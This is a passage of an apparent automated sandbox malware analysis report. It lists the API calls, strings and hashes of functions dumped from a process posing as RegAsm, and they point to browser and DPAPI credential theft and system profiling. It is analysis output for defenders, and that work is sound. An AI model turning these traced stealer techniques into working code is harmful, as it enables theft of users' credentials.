                                                                                                                                                                                                                                                                    • Part of subcall function 0041742B: GetProcAddress.KERNEL32 ref: 00417608
                                                                                                                                                                                                                                                                    • Part of subcall function 0041742B: GetProcAddress.KERNEL32 ref: 0041761F
                                                                                                                                                                                                                                                                    • Part of subcall function 0041742B: GetProcAddress.KERNEL32 ref: 00417636
                                                                                                                                                                                                                                                                    • Part of subcall function 0041742B: GetProcAddress.KERNEL32 ref: 0041764D
                                                                                                                                                                                                                                                                    • Part of subcall function 0040F96A: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F994
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FC12: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,0041736F,004265B7), ref: 0040FC1E
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FC12: HeapAlloc.KERNEL32(00000000,?,?,?,0041736F,004265B7), ref: 0040FC25
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FC12: GetUserNameA.ADVAPI32(00000000,?), ref: 0040FC39
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: _EH_prolog.MSVCRT ref: 0040FAE8
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: lstrlenA.KERNEL32(?,?,?,?,?,0041738F,?,?,00426B18,?,00000000,004265B7), ref: 0040FB10
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: lstrcpy.KERNEL32(00000000), ref: 0040FB37
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: lstrcat.KERNEL32(?,?), ref: 0040FB42
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000,?), ref: 0040FA61
                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 004173D0
                                                                                                                                                                                                                                                                  • Sleep.KERNEL32(00001B58), ref: 004173DB
                                                                                                                                                                                                                                                                  • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,?,00426B18,?,00000000,004265B7), ref: 004173EC
                                                                                                                                                                                                                                                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00417402
                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00417410
                                                                                                                                                                                                                                                                  • ExitProcess.KERNEL32 ref: 00417417
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000555000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000574000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000060E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: AddressProc$wcslen$lstrcpy$CloseEventHandleHeapProcess$AllocCreateExitH_prologLibraryLoadNameOpenSleepUserlstrcatlstrlen
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2119032056-0
                                                                                                                                                                                                                                                                  • Opcode ID: f44390ae83ec2a53febc893590c9efbd6eaa9207bc4d09a789cb7b4316684720
                                                                                                                                                                                                                                                                  • Instruction ID: b0c3368dbeba95a03800b646848d2f179c7d6e98ae7e16720a6a7a4864197866
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f44390ae83ec2a53febc893590c9efbd6eaa9207bc4d09a789cb7b4316684720
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A5116D70904118BBDB20F7A2EC5ACEE7B3DAE52308710407AB501B24D2DF382A49CB69
                                                                                                                                                                                                                                                                  Function 00403A7D Relevance: 9.1, APIs: 6, Instructions: 56stringnetworkCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • _EH_prolog.MSVCRT ref: 00403A82
                                                                                                                                                                                                                                                                  • ??_U@YAPAXI@Z.MSVCRT ref: 00403AB4
                                                                                                                                                                                                                                                                  • ??_U@YAPAXI@Z.MSVCRT ref: 00403ABD
                                                                                                                                                                                                                                                                  • ??_U@YAPAXI@Z.MSVCRT ref: 00403AC6
                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000,00000000,?,?,00000001,000000C8), ref: 00403AE0
                                                                                                                                                                                                                                                                  • InternetCrackUrlA.WININET(00000000,00000000,?,00000001), ref: 00403AF0
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000555000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000574000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000060E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: CrackH_prologInternetlstrlen
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 503950642-0
                                                                                                                                                                                                                                                                  • Opcode ID: add383095bd194c775cbccd07c4459ef089246012b9e457cdc94c3ab7b4f97d6
                                                                                                                                                                                                                                                                  • Instruction ID: 25513c5dd13f52cf69022376d0d52a42e9839c3d89f71734454ae273deb286b7
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: add383095bd194c775cbccd07c4459ef089246012b9e457cdc94c3ab7b4f97d6
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E5115B71D00208ABCB15EFA5D806BDE7B79EF05334F20422BE425B66E0DB389A858B54
                                                                                                                                                                                                                                                                  Function 0040B233 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 186stringCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • _EH_prolog.MSVCRT ref: 0040B238
                                                                                                                                                                                                                                                                    • Part of subcall function 0040F9A1: lstrcpy.KERNEL32(00000000,plA), ref: 0040F9C7
                                                                                                                                                                                                                                                                    • Part of subcall function 004061DE: _EH_prolog.MSVCRT ref: 004061E3
                                                                                                                                                                                                                                                                    • Part of subcall function 004061DE: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 00406206
                                                                                                                                                                                                                                                                    • Part of subcall function 004061DE: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 0040621D
                                                                                                                                                                                                                                                                    • Part of subcall function 004061DE: LocalAlloc.KERNEL32(00000040,?,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 00406239
                                                                                                                                                                                                                                                                    • Part of subcall function 004061DE: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,?,?,?,00000000), ref: 00406253
                                                                                                                                                                                                                                                                    • Part of subcall function 004061DE: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 00406274
                                                                                                                                                                                                                                                                    • Part of subcall function 00410D53: LocalAlloc.KERNEL32(00000040,004131C1,000000C8,00000001,?,004131C0,00000000,00000000), ref: 00410D6C
                                                                                                                                                                                                                                                                    • Part of subcall function 0040F96A: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F994
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: _EH_prolog.MSVCRT ref: 0040FAE8
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: lstrlenA.KERNEL32(?,?,?,?,?,0041738F,?,?,00426B18,?,00000000,004265B7), ref: 0040FB10
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: lstrcpy.KERNEL32(00000000), ref: 0040FB37
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: lstrcat.KERNEL32(?,?), ref: 0040FB42
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000,?), ref: 0040FA61
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA6F: _EH_prolog.MSVCRT ref: 0040FA74
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA6F: lstrcpy.KERNEL32(00000000), ref: 0040FAC0
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA6F: lstrcat.KERNEL32(?,?), ref: 0040FACA
                                                                                                                                                                                                                                                                  • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00425F30,00425C3B), ref: 0040B2F9
                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000), ref: 0040B315
                                                                                                                                                                                                                                                                    • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                                                                                                                                                                                                    • Part of subcall function 0040B002: _EH_prolog.MSVCRT ref: 0040B007
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000555000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000574000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000060E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: H_prolog$lstrcpy$File$AllocLocallstrcatlstrlen$CloseCreateHandleReadSize
                                                                                                                                                                                                                                                                  • String ID: ^userContextId=4294967295$moz-extension+++
                                                                                                                                                                                                                                                                  • API String ID: 2813378046-3310892237
                                                                                                                                                                                                                                                                  • Opcode ID: 87ac7a6719ab82e4a12d422d037297c3c62a0b91d24161bddc916d4476618f68
                                                                                                                                                                                                                                                                  • Instruction ID: c7357e689bea5f598632d395668510103b20eed8d76ccd924dd8ffa454bfe75b
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 87ac7a6719ab82e4a12d422d037297c3c62a0b91d24161bddc916d4476618f68
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F3717A70905288EADF14EBA5D946BDDBBB4AF15308F14407EE805732C2DB781B0CCBA6
                                                                                                                                                                                                                                                                  Function 00406538 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 153libraryCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • _EH_prolog.MSVCRT ref: 0040653D
                                                                                                                                                                                                                                                                    • Part of subcall function 0040F96A: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F994
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: _EH_prolog.MSVCRT ref: 0040FAE8
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: lstrlenA.KERNEL32(?,?,?,?,?,0041738F,?,?,00426B18,?,00000000,004265B7), ref: 0040FB10
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: lstrcpy.KERNEL32(00000000), ref: 0040FB37
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: lstrcat.KERNEL32(?,?), ref: 0040FB42
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA6F: _EH_prolog.MSVCRT ref: 0040FA74
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA6F: lstrcpy.KERNEL32(00000000), ref: 0040FAC0
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA6F: lstrcat.KERNEL32(?,?), ref: 0040FACA
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000,?), ref: 0040FA61
                                                                                                                                                                                                                                                                  • GetEnvironmentVariableA.KERNEL32(C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,0000FFFF,00000000,?,?,00425B9C,?,?,?,00425B97,?), ref: 004065FA
                                                                                                                                                                                                                                                                    • Part of subcall function 0040F9DE: lstrlenA.KERNEL32(?,00000000,?,00416ABD,004265A7,004265A6,00000000,00000000,?,0041740F), ref: 0040F9E7
                                                                                                                                                                                                                                                                    • Part of subcall function 0040F9DE: lstrcpy.KERNEL32(00000000,00000000), ref: 0040FA1B
                                                                                                                                                                                                                                                                  • SetEnvironmentVariableA.KERNEL32(00000000,00000000,?,?,?,00425BA0,C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,00425B9B), ref: 00406672
                                                                                                                                                                                                                                                                  • LoadLibraryA.KERNEL32(00000000), ref: 0040668D
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  • C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;, xrefs: 004065EE, 004065F3, 0040660D
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000555000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000574000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000060E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: lstrcpy$H_prolog$EnvironmentVariablelstrcatlstrlen$LibraryLoad
                                                                                                                                                                                                                                                                  • String ID: C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;
                                                                                                                                                                                                                                                                  • API String ID: 757424748-3463377506
                                                                                                                                                                                                                                                                  • Opcode ID: b63b185479eff29bd76d908345aec26636ffe626ea3533ac832c466915f83b42
                                                                                                                                                                                                                                                                  • Instruction ID: 50f50e59df51771b9fab9c58f3d28e6a6edd4c8786144af080221e29f4539bcc
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b63b185479eff29bd76d908345aec26636ffe626ea3533ac832c466915f83b42
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FA616070801148EFDB15EBA5DD12AEDBBB6AB15308F14407EE406735E1DB381A1CCFA9
                                                                                                                                                                                                                                                                  Function 0040C1DA Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • _EH_prolog.MSVCRT ref: 0040C1DF
                                                                                                                                                                                                                                                                    • Part of subcall function 0040F96A: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F994
                                                                                                                                                                                                                                                                    • Part of subcall function 004061DE: _EH_prolog.MSVCRT ref: 004061E3
                                                                                                                                                                                                                                                                    • Part of subcall function 004061DE: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 00406206
                                                                                                                                                                                                                                                                    • Part of subcall function 004061DE: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 0040621D
                                                                                                                                                                                                                                                                    • Part of subcall function 004061DE: LocalAlloc.KERNEL32(00000040,?,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 00406239
                                                                                                                                                                                                                                                                    • Part of subcall function 004061DE: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,?,?,?,00000000), ref: 00406253
                                                                                                                                                                                                                                                                    • Part of subcall function 004061DE: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 00406274
                                                                                                                                                                                                                                                                    • Part of subcall function 00410D53: LocalAlloc.KERNEL32(00000040,004131C1,000000C8,00000001,?,004131C0,00000000,00000000), ref: 00410D6C
                                                                                                                                                                                                                                                                  • StrStrA.SHLWAPI(00000000,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0040C232
                                                                                                                                                                                                                                                                    • Part of subcall function 00406295: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,LY@,00000000,00000000), ref: 004062B5
                                                                                                                                                                                                                                                                    • Part of subcall function 00406295: LocalAlloc.KERNEL32(00000040,LY@,?,?,0040594C,00000000,?,?), ref: 004062C3
                                                                                                                                                                                                                                                                    • Part of subcall function 00406295: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,LY@,00000000,00000000), ref: 004062D9
                                                                                                                                                                                                                                                                    • Part of subcall function 00406295: LocalFree.KERNEL32(00000000,?,?,0040594C,00000000,?,?), ref: 004062E8
                                                                                                                                                                                                                                                                  • memcmp.MSVCRT ref: 0040C270
                                                                                                                                                                                                                                                                    • Part of subcall function 004062F8: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 0040631B
                                                                                                                                                                                                                                                                    • Part of subcall function 004062F8: LocalAlloc.KERNEL32(00000040,?,?), ref: 00406333
                                                                                                                                                                                                                                                                    • Part of subcall function 004062F8: LocalFree.KERNEL32(?), ref: 00406351
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000555000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000574000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000060E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Local$Alloc$CryptFile$BinaryFreeH_prologString$CloseCreateDataHandleReadSizeUnprotectlstrcpymemcmp
                                                                                                                                                                                                                                                                  • String ID: $DPAPI
                                                                                                                                                                                                                                                                  • API String ID: 2477620391-1819349886
                                                                                                                                                                                                                                                                  • Opcode ID: fa65e4e18c875cdfd5459dad36ea4a0cced917944b5814fb8fd39d4a1765a3e5
                                                                                                                                                                                                                                                                  • Instruction ID: aa512e4a142dd9994e98914fb173fcfcef89dbe6dd984e8a5c5467935661000a
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fa65e4e18c875cdfd5459dad36ea4a0cced917944b5814fb8fd39d4a1765a3e5
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7921B472D00105ABCF11EBE5DD429EFBB79EF40314F14027BF911B21E1EB3996518AA9
                                                                                                                                                                                                                                                                  Function 00410693 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 40memoryregistryCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00000104,00000001,?,?,?,00414B0F,00000000,?,Windows: ,00000000,?,00426614,00000000,?,Work Dir: In memory), ref: 004106A7
                                                                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000,?,?,?,00414B0F,00000000,?,Windows: ,00000000,?,00426614,00000000,?,Work Dir: In memory,00000000,?), ref: 004106AE
                                                                                                                                                                                                                                                                  • RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,00000000,?,?,?,00414B0F,00000000,?,Windows: ,00000000,?,00426614,00000000,?), ref: 004106DC
                                                                                                                                                                                                                                                                  • RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,000000FF,?,?,?,00414B0F,00000000,?,Windows: ,00000000,?,00426614,00000000), ref: 004106F8
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000555000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000574000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000060E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Heap$AllocOpenProcessQueryValue
                                                                                                                                                                                                                                                                  • String ID: Windows 11
                                                                                                                                                                                                                                                                  • API String ID: 3676486918-2517555085
                                                                                                                                                                                                                                                                  • Opcode ID: a7d6c6778bab858a86d37ca9744766c2ccdea0d6c3a046aa352b062596e876b8
                                                                                                                                                                                                                                                                  • Instruction ID: f2c56931d2d85bb930a9e066adf37ad73cc521c459cf8c5c84336d95b4111fd6
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a7d6c6778bab858a86d37ca9744766c2ccdea0d6c3a046aa352b062596e876b8
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D5F06879640208FBEB105B91DD0EF9B7A7EEB46B00F101025BB01D91A1EBB599D4DB24
                                                                                                                                                                                                                                                                  Function 0040FB97 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 37memoryregistryCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,0040FC09,004106BB,?,?,?,00414B0F,00000000,?,Windows: ,00000000), ref: 0040FBAB
                                                                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000,?,?,?,0040FC09,004106BB,?,?,?,00414B0F,00000000,?,Windows: ,00000000,?,00426614), ref: 0040FBB2
                                                                                                                                                                                                                                                                  • RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,00000000,?,?,?,0040FC09,004106BB,?,?,?,00414B0F,00000000,?,Windows: ), ref: 0040FBD0
                                                                                                                                                                                                                                                                  • RegQueryValueExA.KERNEL32(00000000,CurrentBuildNumber,00000000,00000000,00000000,000000FF,?,?,?,0040FC09,004106BB,?,?,?,00414B0F,00000000), ref: 0040FBEB
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
